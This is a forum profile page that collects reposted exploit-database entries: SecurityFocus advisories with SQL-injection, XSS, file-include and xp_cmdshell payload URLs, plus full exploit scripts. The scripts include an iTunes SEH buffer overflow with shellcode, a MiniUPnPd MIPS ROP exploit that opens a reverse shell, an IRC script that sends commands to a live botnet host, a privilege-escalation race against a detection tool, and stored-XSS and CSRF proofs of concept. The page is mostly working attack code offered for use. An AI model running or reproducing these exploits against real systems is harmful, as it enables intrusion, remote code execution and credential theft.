Everything posted by HireHackking

  1. source: https://www.securityfocus.com/bid/52063/info

     Impulsio CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

     http://www.example.com/index.php?id=[SQL]
  2. source: https://www.securityfocus.com/bid/52076/info

     Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.

     https://www.example.com/cgi-bin/dnat.cgi#createrule[XSS]
  3. source: https://www.securityfocus.com/bid/52077/info

     The X-Shop component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

     http://www.example.com/index.php?option=com_x-shop&action=artdetail&idd='
  4. source: https://www.securityfocus.com/bid/52076/info

     Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.

     https://www.example.com/cgi-bin/dansguardian.cgi#addrule[XSS]
  5. #
     # legend_rce.py
     # Legend Perl IRC Bot Remote Code Execution PoC
     # author: Jay Turla ( @shipcod3 )
     # description: This is a RCE PoC for Legend Bot which has been used in the Shellshock spam October 2014.
     # reference: http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html
     # greetz to ROOTCON (rootcon.org) goons
     #

     import socket
     import sys

     def usage():
         print("USAGE: python legend_rce.py nick")
         print("Sample nicks found in the wild: god, ARZ, Zax, HackTech, TheChozen")

     def main(argv):
         if len(argv) < 2:
             return usage()

         #irc server connection settings
         botnick = sys.argv[1] #admin payload for taking over the Legend Bot
         server = "80.246.50.71" #irc server
         channel = "#Apache" #channel where the bot is located
         irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket
         print "connecting to:"+server
         irc.connect((server, 2015)) #connects to the server, you can change the port by changing 2015 for example :)
         irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :legend.rocks\n") #user authentication
         irc.send("NICK "+ botnick +"\n") #sets nick
         irc.send("JOIN "+ channel +"\n") #join the chan
         irc.send("PRIVMSG "+channel+" :!legend @system 'uname -a' \n") #send the payload to the bot

         while 1: #puts it in a loop
             text=irc.recv(2040) #receive the text
             print text #print text to console

             if text.find('PING') != -1: #check if 'PING' is found
                 irc.send('PONG ' + text.split()[1] + '\r\n') #returns 'PONG' back to the server (prevents pinging out!)

             if text.find('!quit') != -1: #quit the Bot
                 irc.send("QUIT\r\n")
                 sys.exit()

             if text.find('Linux') != -1:
                 irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n")
                 irc.send("QUIT\r\n")
                 sys.exit()

     if __name__ == "__main__":
         main(sys.argv)
  6. source: https://www.securityfocus.com/bid/52078/info

     The Xcomp component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.

     http://www.example.com/index.php?option=com_xcomp&controller=../../[LFI]%00
  7. # Exploit Title: Apple Itunes PLS title buffer overflow
     # Date: April 26 ,2015 (Day of disclosing this exploit code)
     # Exploit Author: Fady Mohamed Osman (@fady_osman)
     # Vendor Homepage: http://www.apple.com
     # Software Link: http://www.apple.com/itunes/download/?id=890128564
     # Version: 10.6.1.7
     # Tested on: Windows Xp sp3
     # Exploit-db : http://www.exploit-db.com/author/?a=2986
     # Youtube : https://www.youtube.com/user/cutehack3r

     header = "[Playlist]\r\n"
     header << "NumberOfEntries=1\r\n"
     header << "File1=http://www.panix.com/web/faq/multimedia/sample.mp3\r\n"
     header << "Title1="

     nseh_longer = "\xeb\x1E\x90\x90"
     nseh_shorter = "\xeb\x06\x90\x90"
     seh = 0x72d119de #pop pop ret from msacm32.drv

     shell = "\xdd\xc1\xd9\x74\x24\xf4\xbb\x2b\x2b\x88\x37\x5a\x31\xc9" +
             "\xb1\x33\x83\xea\xfc\x31\x5a\x13\x03\x71\x38\x6a\xc2\x79" +
             "\xd6\xe3\x2d\x81\x27\x94\xa4\x64\x16\x86\xd3\xed\x0b\x16" +
             "\x97\xa3\xa7\xdd\xf5\x57\x33\x93\xd1\x58\xf4\x1e\x04\x57" +
             "\x05\xaf\x88\x3b\xc5\xb1\x74\x41\x1a\x12\x44\x8a\x6f\x53" +
             "\x81\xf6\x80\x01\x5a\x7d\x32\xb6\xef\xc3\x8f\xb7\x3f\x48" +
             "\xaf\xcf\x3a\x8e\x44\x7a\x44\xde\xf5\xf1\x0e\xc6\x7e\x5d" +
             "\xaf\xf7\x53\xbd\x93\xbe\xd8\x76\x67\x41\x09\x47\x88\x70" +
             "\x75\x04\xb7\xbd\x78\x54\xff\x79\x63\x23\x0b\x7a\x1e\x34" +
             "\xc8\x01\xc4\xb1\xcd\xa1\x8f\x62\x36\x50\x43\xf4\xbd\x5e" +
             "\x28\x72\x99\x42\xaf\x57\x91\x7e\x24\x56\x76\xf7\x7e\x7d" +
             "\x52\x5c\x24\x1c\xc3\x38\x8b\x21\x13\xe4\x74\x84\x5f\x06" +
             "\x60\xbe\x3d\x4c\x77\x32\x38\x29\x77\x4c\x43\x19\x10\x7d" +
             "\xc8\xf6\x67\x82\x1b\xb3\x98\xc8\x06\x95\x30\x95\xd2\xa4" +
             "\x5c\x26\x09\xea\x58\xa5\xb8\x92\x9e\xb5\xc8\x97\xdb\x71" +
             "\x20\xe5\x74\x14\x46\x5a\x74\x3d\x25\x3d\xe6\xdd\x84\xd8" +
             "\x8e\x44\xd9"

     #1020 --> offset in local exploits
     payload = header + "A" * 1020 + nseh_shorter + [seh].pack('V') + shell

     #380 or 404 (if itunes wasn't already loaded)--> offset in remote ones using the itms protocol.
     payload_remote = header + "A" * 380 + nseh_longer + [seh].pack('V') + "A" * 16 + nseh_shorter + [seh].pack('V') + shell

     # when using as local exploit
     open('exploit.pls', 'w') { |f| f.puts payload }
     puts('local file created')

     # place this in a web server and use the itms:// protocol to load it.
     open('exploit_remote.pls', 'w') { |f| f.puts payload_remote }
     puts('remote file created')
  8. #!/usr/bin/env python
     # Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series
     # Date: 26.04.2015
     # Exploit Author: Onur ALANBEL (BGA)
     # Vendor Homepage: http://miniupnp.free.fr/
     # Version: 1.0
     # Architecture: MIPS
     # Tested on: AirTies RT-204v3
     # CVE : 2013-0230
     # Exploit gives a reverse shell to lhost:lport
     # Details: https://www.exploit-db.com/docs/english/36806-developing-mips-exploits-to-hack-routers.pdf

     import urllib2
     from string import join
     from argparse import ArgumentParser
     from struct import pack
     from socket import inet_aton

     BYTES = 4

     def hex2str(value, size=BYTES):
         data = ""
         for i in range(0, size):
             data += chr((value >> (8*i)) & 0xFF)
         data = data[::-1]
         return data

     arg_parser = ArgumentParser(prog="miniupnpd_mips.py",
                                 description="MiniUPnPd CVE-2013-0230 Reverse Shell exploit for AirTies RT Series, start netcat on lhost:lport")
     arg_parser.add_argument("--target", required=True, help="Target IP address")
     arg_parser.add_argument("--lhost", required=True, help="The IP address which nc is listening")
     arg_parser.add_argument("--lport", required=True, type=int, help="The port which nc is listening")
     args = arg_parser.parse_args()

     libc_base = 0x2aabd000
     ra_1 = hex2str(libc_base + 0x36860)   # ra = 1. gadget
     s1 = hex2str(libc_base + 0x1636C)     # s1 = 2. gadget
     sleep = hex2str(libc_base + 0x35620)  # sleep function
     ra_2 = hex2str(libc_base + 0x28D3C)   # ra = 3. gadget
     s6 = hex2str(libc_base + 0x1B19C)     # ra = 4.gadget
     s2 = s6

     lport = pack('>H', args.lport)
     lhost = inet_aton(args.lhost)

     shellcode = join([
         "\x24\x11\xff\xff"
         "\x24\x04\x27\x0f"
         "\x24\x02\x10\x46"
         "\x01\x01\x01\x0c"
         "\x1e\x20\xff\xfc"
         "\x24\x11\x10\x2d"
         "\x24\x02\x0f\xa2"
         "\x01\x01\x01\x0c"
         "\x1c\x40\xff\xf8"
         "\x24\x0f\xff\xfa"
         "\x01\xe0\x78\x27"
         "\x21\xe4\xff\xfd"
         "\x21\xe5\xff\xfd"
         "\x28\x06\xff\xff"
         "\x24\x02\x10\x57"
         "\x01\x01\x01\x0c"
         "\xaf\xa2\xff\xff"
         "\x8f\xa4\xff\xff"
         "\x34\x0f\xff\xfd"
         "\x01\xe0\x78\x27"
         "\xaf\xaf\xff\xe0"
         "\x3c\x0e" + lport +
         "\x35\xce" + lport +
         "\xaf\xae\xff\xe4"
         "\x3c\x0e" + lhost[:2] +
         "\x35\xce" + lhost[2:4] +
         "\xaf\xae\xff\xe6"
         "\x27\xa5\xff\xe2"
         "\x24\x0c\xff\xef"
         "\x01\x80\x30\x27"
         "\x24\x02\x10\x4a"
         "\x01\x01\x01\x0c"
         "\x24\x0f\xff\xfd"
         "\x01\xe0\x78\x27"
         "\x8f\xa4\xff\xff"
         "\x01\xe0\x28\x21"
         "\x24\x02\x0f\xdf"
         "\x01\x01\x01\x0c"
         "\x24\x10\xff\xff"
         "\x21\xef\xff\xff"
         "\x15\xf0\xff\xfa"
         "\x28\x06\xff\xff"
         "\x3c\x0f\x2f\x2f"
         "\x35\xef\x62\x69"
         "\xaf\xaf\xff\xec"
         "\x3c\x0e\x6e\x2f"
         "\x35\xce\x73\x68"
         "\xaf\xae\xff\xf0"
         "\xaf\xa0\xff\xf4"
         "\x27\xa4\xff\xec"
         "\xaf\xa4\xff\xf8"
         "\xaf\xa0\xff\xfc"
         "\x27\xa5\xff\xf8"
         "\x24\x02\x0f\xab"
         "\x01\x01\x01\x0c"
     ], '')

     payload = 'C'*2052 + s1 + 'C'*(4*4) + s6 + ra_1 + 'C'*28 + sleep + 'C'*40 + s2 + ra_2 + 'C'*32 + shellcode

     soap_headers = {
         'SOAPAction': "n:schemas-upnp-org:service:WANIPConnection:1#" + payload,
     }

     soap_data = """
     <?xml version='1.0' encoding="UTF-8"?>
     <SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
     xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
     xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" >
     <SOAP-ENV:Body>
     <ns1:action xmlns:ns1="urn:schemas-upnp-org:service:WANIPConnection:1" SOAP-ENC:root="1">
     </ns1:action>
     </SOAP-ENV:Body>
     </SOAP-ENV:Envelope>
     """

     try:
         print "Exploiting..."
         req = urllib2.Request("http://" + args.target + ":5555", soap_data, soap_headers)
         res = urllib2.urlopen(req).read()
     except:
         print "Ok"
  9. #!/usr/bin/python
     # EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC
     # AUTHOR: Avinash Kumar Thapa "-Acid"
     # Date of Testing: 26th April'2015
     # Vendor Homepage: http://www.wireshark.org
     # Tested On : Windows 8.1 Pro
     # Steps to Reproduce the Crash
     # Step 1: Create a File Using PoC
     # Step 2: Go to wireshark and in filter field, put ip.addr=={Buffer}
     # Step 3: Click "Apply"
     # Some other places for the Crash are:
     # Statistics > IP Statistics then any of the field you can use.
     # Statistics > Packet Length > Paste the buffer in the field
     # Statistics > ANCP
     # Statistics > Collectd
     # Statistics > Compared
     # Statistics >

     buffer = "A"*80000
     file = open("wireshark.txt","w")
     file.write(buffer)
     file.close()
     print "POC Created by -Acid"
     print " Email: acid.exploit@gmail.com"
  10. # Exploit Title: UniPDF v1.2 BufferOverflow, SEH overwrite DoS PoC
      # Author : Avinash Kumar Thapa "-Acid"
      # Date of Testing : 25th April 2015
      # Tested On : Windows XP- Service Pack 3 && Windows 7 Home Basic
      # Vendor Homepage: http://unipdf.com/
      # Software Link: http://unipdf.com/file/unipdf-setup.exe
      # Steps to reproduce the Crash is:
      # Step 1: Run the POC
      # Step 2: Go to local Disk C:\Program Files\UniPDF and copy the POC there
      # Step 3 : Run the UniPdf.exe

      buff2 = "\x41" * 3000

      crash = " <config>\n"
      crash += " <UserDefine>\n"
      crash += "<Language ID=\"0\" />\n"
      crash += "<Path PathSet=\""+buff2+"\" Path=\"\" />\n"
      crash += "<ImageFormat set=\"2\" />\n"
      crash += "<Res set=\"96\" />\n"
      crash += "<bit set=\"24\" />\n"
      crash += "<Prefix set=\"\" />\n"
      crash += "<Doc set=\"1\" />\n"
      crash += "<Help set=\"1\" />\n"
      crash += "</UserDefine>\n"
      crash += "</config>\n"

      print "POC Created By -Acid"
      print " acid.exploit@gmail.com"

      file = open("update.xml","w")
      file.write(crash)
      file.close()
  11. # Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS
      # Date: 28.01.2014
      # Exploit Author: Adam Ziaja http://adamziaja.com
      # Vendor Homepage: https://www.otrs.com
      # Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5
      # CVE : CVE-2014-1695

      #!/usr/bin/perl -w
      use strict;
      use MIME::Lite;

      my $msg = MIME::Lite->new(
          Subject => 'OTRS XSS PoC',
          From    => 'attacker@example.com',
          To      => 'otrs@example.com',
          Type    => 'text/html',
          Data    => '<html><body><img/onerror="alert(\'XSS1\')"src=a><iframe src=javasc&#x72ipt:alert(\'XSS2\') ></body></html>'
      );
      $msg->send();
  12. Source: http://klikki.fi/adv/wordpress2.html

      ## Overview

      Current versions of WordPress are vulnerable to a stored XSS. An unauthenticated attacker can inject JavaScript in WordPress comments. The script is triggered when the comment is viewed. If triggered by a logged-in administrator, under default settings the attacker can leverage the vulnerability to execute arbitrary code on the server via the plugin and theme editors. Alternatively the attacker could change the administrator’s password, create new administrator accounts, or do whatever else the currently logged-in administrator can do on the target system.

      ## Details

      If the comment text is long enough, it will be truncated when inserted in the database. The MySQL TEXT type size limit is 64 kilobytes, so the comment has to be quite long. The truncation results in malformed HTML generated on the page. The attacker can supply any attributes in the allowed HTML tags, in the same way as with the two recently published stored XSS vulnerabilities affecting the WordPress core.

      The vulnerability bears a similarity to the one reported by Cedric Van Bockhaven in 2014 (patched this week, after 14 months). Instead of using an invalid character to truncate the comment, this time an excessively long comment is used for the same effect. In these two cases, the injected JavaScript apparently can't be triggered in the administrative Dashboard so these exploits seem to require getting around comment moderation e.g. by posting one harmless comment first.

      The similar vulnerability released by Klikki in November 2014 could be exploited in the administrative Dashboard while the comment is still in the moderation queue. Some exploit attempts of this have been recently reported in the wild.

      ## Proof of Concept

      Enter as a comment text:

      <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>

      Confirmed vulnerable: WordPress 4.2, 4.1.2, 4.1.1, 3.9.3. Tested with MySQL versions 5.1.53 and 5.5.41.

      ## Demo

      https://www.youtube.com/watch?v=OCqQZJZ1Ie4
  13. source: https://www.securityfocus.com/bid/52079/info

      Tiki Wiki CMS Groupware is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible.

      http://www.example.com/tiki-featured_link.php?type=f&url=http://www.example2.com
  14. # iFTP 2.21 SEH overwritten Crash PoC
      # Author: Avinash Kumar Thapa "-Acid"
      # Date of Testing : 28th April'2015
      # Vendor's home page: http://www.memecode.com/iftp.php
      # Software's Url: http://www.memecode.com/data/iftp-win32-v2.21.exe
      # Crash Point: Go to Schedule > Schedule download > {+} >Time field

      buffer = "A"*600
      buffer += "BBBB" # Pointer to Next SEH Record
      buffer += "CCCC" # SEH HANDLER

      file = "test.txt"
      f = open(file, "w")
      f.write(buffer)
      f.close()
  15. source: https://www.securityfocus.com/bid/52081/info

      VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input. A remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; these may aid in further attacks.

      VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected.

      http://www.example.com/voxlog/GET.PHP?v=ZmlsZT1DOi9ib290LmluaQ==
  16. source: https://www.securityfocus.com/bid/52081/info

      VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input. A remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; these may aid in further attacks.

      VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected.

      http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);waitfor delay '0:0:5' --+
      http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);exec master..xp_cmdshell 'xxxxx' --+
  17. source: https://www.securityfocus.com/bid/52085/info

      F*EX is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.

      http://www.example.com/fup [id parameter]
      http://www.example.com/fup [to parameter]
      http://www.example.com/fup [from parameter]
  18. source: https://www.securityfocus.com/bid/52086/info

      TestLink is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

      http://www.example.com/lib/ajax/getrequirementnodes.php?root_node=1 OR 1=1
      http://www.example.com/lib/ajax/gettprojectnodes.php?root_node=4 OR 1=1
      http://www.example.com/lib/cfields/cfieldsEdit.php?do_action=edit&cfield_id=1 AND 3653=BENCHMARK(5000000,MD5(1))
      http://www.example.com/lib/plan/planMilestonesEdit.php?doAction=edit&id=7 AND 5912=BENCHMARK(5000000,MD5(1))
      http://www.example.com/lib/plan/planMilestonesEdit.php?doAction=create&tplan_id=2623 AND 5912=BENCHMARK(5000000,MD5(1))
      http://www.example.com/lib/requirements/reqEdit.php?doAction=create&req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1))
      http://www.example.com/lib/requirements/reqImport.php?req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1))
      http://www.example.com/lib/requirements/reqSpecAnalyse.php?req_spec_id=2622 OR 1=1
      http://www.example.com/lib/requirements/reqSpecPrint.php?req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1))
      http://www.example.com/lib/requirements/reqSpecView.php?req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1))
  19. source: https://www.securityfocus.com/bid/52088/info

      Dolphin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

      Dolphin 7.0.7 and prior versions are vulnerable.

      http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&photos_only='"><script>alert(/xss/)</script>
      http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&online_only='"><script>alert(/xss/)</script>
      http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&sort=activity&mode='"><script>alert(/xss/)</script>
  20. source: https://www.securityfocus.com/bid/52088/info

      Dolphin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

      Dolphin 7.0.7 and prior versions are vulnerable.

      http://www.example.com/dolph/explanation.php?explain=%27%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
  21. #[Title] Ninja privilege escalation detection and prevention system race condition
      #[Author] Ben 'highjack' Sheppard
      #[URL] http://highjack.github.io/
      #[Description] There is a small delay between the time of execution of a command and the time privilege escalation is detected.
      #It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
      #The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
      #[Software Link] http://forkbomb.org/ninja/
      #[Date] 29/04/2015
      #[Version] 0.1.3
      #[Tested on] Kali Linux
      #[Demo] https://www.youtube.com/watch?v=P8VJCUUJPLg
      #See me hitting every open port, 'cause I'm banging on their system while I'm staying out of the court
      #https://www.youtube.com/watch?v=eA136fOsSeQ

      import pty, os, sys, subprocess

      pid, fd = pty.fork()

      #begin config
      user = "root"
      password = "mypassword" #change this :)
      command = "killall -9 ninja"
      #end config

      def usage():
          # the original prints an ASCII-art "highjack" banner here; its line layout did not survive extraction
          print """
      [Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition
      [Author] Ben 'highjack' Sheppard
      [URL] http://highjack.github.io/
      [Description] There is a small delay between the time of execution of a command and the time privilege escalation is detected.
      It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
      The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
      """

      executions = 0

      def check_procs():
          p1 = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE)
          p2 = subprocess.Popen(["grep", "root"], stdin=p1.stdout, stdout=subprocess.PIPE)
          p3 = subprocess.Popen(["grep", "/sbin/ninja"], stdin=p2.stdout, stdout=subprocess.PIPE)
          output = p3.communicate()[0]
          if output != "":
              if executions != 0:
                  sys.exit(0)
              return True
          else:
              return False

      def kill_ninja():
          if pid == 0:
              os.execvp("su", ["su", user, "-c", command])
          elif pid > 0:
              try:
                  os.read(fd, 1024)
                  os.write(fd, password + "\n")
                  os.read(fd, 1024)
                  os.wait()
                  os.close(fd)
              except:
                  usage()
                  print "[+] Ninja is terminated"
                  sys.exit(0)

      while True:
          kill_ninja()
          # the original compared the function object itself (check_procs == True), which is never true; it has to be called
          if check_procs():
              executions = executions + 1
              kill_ninja()
  22. source: https://www.securityfocus.com/bid/52091/info

      The 'com_xvs' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

      http://www.example.com/index.php?option=com_xvs&controller=../../[LFI]%00
  23. #####################################################################################
      Application: Foxit Reader PDF Parsing Memory Corruption
      Platforms: Windows
      Versions: The vulnerabilities are reported in Foxit Reader and Foxit Enterprise Reader versions 7.1.0.306 and 7.1.3.320 and Foxit Phantom PDF versions 7.1.0.306, 7.1.2.311, and 7.1.3.320.
      Secunia: SA63346
      {PRL}: 2015-05
      Author: Francis Provencher (Protek Research Lab’s)
      Website: http://www.protekresearchlab.com/
      Twitter: @ProtekResearch
      #####################################################################################

      1) Introduction
      2) Report Timeline
      3) Technical details
      4) POC

      #####################################################################################

      ===============
      1) Introduction
      ===============

      Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files.[3] Early versions of Foxit Reader were notable for startup performance and small file size.[citation needed] Foxit has been compared favorably to Adobe Reader.[4][5][6] The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing. (http://en.wikipedia.org/wiki/Foxit_Reader)

      #####################################################################################

      ============================
      2) Report Timeline
      ============================

      2015-04-09: Francis Provencher from Protek Research Lab’s found the issue;
      2015-04-13: Foxit Security Response Team confirmed the issue;
      2015-04-28: Foxit fixed the issue;

      #####################################################################################

      ============================
      3) Technical details
      ============================

      A memory corruption occurred within the LZW algorithm that is used to decode GIF. A specifically crafted GIF could lead to a controlled memory corruption.

      #####################################################################################

      ===========
      4) POC
      ===========

      http://protekresearchlab.com/exploits/PRL-2015-05.pdf
      https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36859.pdf

      ###############################################################################
  24. Advisory ID: HTB23254 Product: TheCartPress WordPress plugin Vendor: TheCartPress team Vulnerable Version(s): 1.3.9 and probably prior Tested Version: 1.3.9 Advisory Publication: April 8, 2015 [without technical details] Vendor Notification: April 8, 2015 Public Disclosure: April 29, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79], Improper Access Control [CWE-284] CVE References: CVE-2015-3301, CVE-2015-3300, CVE-2015-3302 Risk Level: High CVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in TheCartPress WordPress plugin, which can be exploited to execute arbitrary PHP code, disclose sensitive data, and perform Cross-Site Scripting attacks against users of WordPress installations with the vulnerable plugin. 1) Local PHP File Inclusion in TheCartPress WordPress plugin: CVE-2015-3301 Input passed via the "tcp_box_path" HTTP POST parameter passed to "/wp-admin/admin.php?page=checkout_editor_settings" URL is not properly verified before being used in PHP 'include()' function, and can be abused to include arbitrary local files via directory traversal sequences. In order to successfully exploit the vulnerability an attacker needs to have administrator privileges on WordPress installation, however this can be also exploited via CSRF vector to which the script is vulnerable as well. 
Simple CSRF exploit below will execute the content of '/etc/passwd' file when a logged-in administrator will visit a page with it: <form action="http://wordpress/wp-admin/admin.php?page=checkout_editor_settings" method="post" name="main"> <input type="hidden" name="tcp_save_fields" value='1'> <input type="hidden" name="tcp_box_path" value='../../../../../etc/passwd'> <input type="submit" id="btn"> </form> <script> document.main.submit(); </script> 2) Stored XSS in TheCartPress WordPress plugin: CVE-2015-3300 During the checkout process, many user-supplied HTTP POST parameters (see complete list in PoC)in "Shipping address" and "Billing address" sections are not being sanitized before being stored in the local database. Simple mass-XSS PoC against "Billing address" section (PoC against "Shipping address" scetion is identical, just replace 'billing_' prefix with 'shipping_') will write several JS pop-up alerts into the application database: <form action="http://wordpress/shopping-cart/checkout/" method="post" name="main"> <input type="hidden" name="selected_billing_id" value='1'> <input type="hidden" name="selected_billing_address" value='new'> <input type="hidden" name="billing_firstname" value='"><script>alert(/immuniweb/);</script>'> <input type="hidden" name="billing_lastname" value='"><script>alert(/immuniweb/);</script>'> <input type="hidden" name="billing_company" value='"><script>alert(/immuniweb/);</script>'> <input type="hidden" name="billing_tax_id_number" value='"><script>alert(/immuniweb/);</script>'> <input type="hidden" name="billing_country_id" value='AF'> <input type="hidden" name="billing_region_id" value=''> <input type="hidden" name="billing_region" value=''> <input type="hidden" name="billing_city" value='"><script>alert(/immuniweb/);</script>'> <input type="hidden" name="billing_street" value='"><script>alert(/immuniweb/);</script>'> <input type="hidden" name="billing_street_2" value='"><script>alert(/immuniweb/);</script>'> <input type="hidden" 
name="billing_postcode" value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_telephone_1" value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_telephone_2" value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_fax" value='"><script>alert(/immuniweb/);</script>'>
<input type="hidden" name="billing_email" value='mail@mail.com'>
<input type="hidden" name="tcp_continue" value=''>
<input type="hidden" name="tcp_step" value='1'>
<input type="submit" id="btn">
</form>

A non-authenticated attacker may inject malicious HTML and JS code that will be stored in the application database and made available to any non-authenticated user on the following URL:

http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order

As well as on the following URL, accessible to the WordPress administrator only:

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/OrdersListTable.php

3) Improper Access Control in TheCartPress WordPress plugin: CVE-2015-3302

Any non-authenticated user may browse orders of other users due to a broken authentication mechanism.

To reproduce the vulnerability an attacker shall first open the following URL:

http://wordpress/shopping-cart/checkout/?tcp_checkout=ok&order_id=[order_id]

And just after that open the following URL to see full order details:

http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order

Moreover, the order ID can be easily predicted, as every new order ID is an incremented value of the previous one. This enables a non-authenticated remote attacker to steal all currently-existing orders.

4) Multiple XSS in TheCartPress WordPress plugin (against administrator only): CVE-2015-3300

4.1 Input passed via the "search_by" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php" is not properly sanitised before being returned to the user.

A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php&search_by=--%3E%%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

4.2 Input passed via the "address_id", "address_name", "firstname", "lastname", "street", "city", "postcode", "email" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php" is not properly sanitised before being returned to the user.

A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_name=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&firstname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
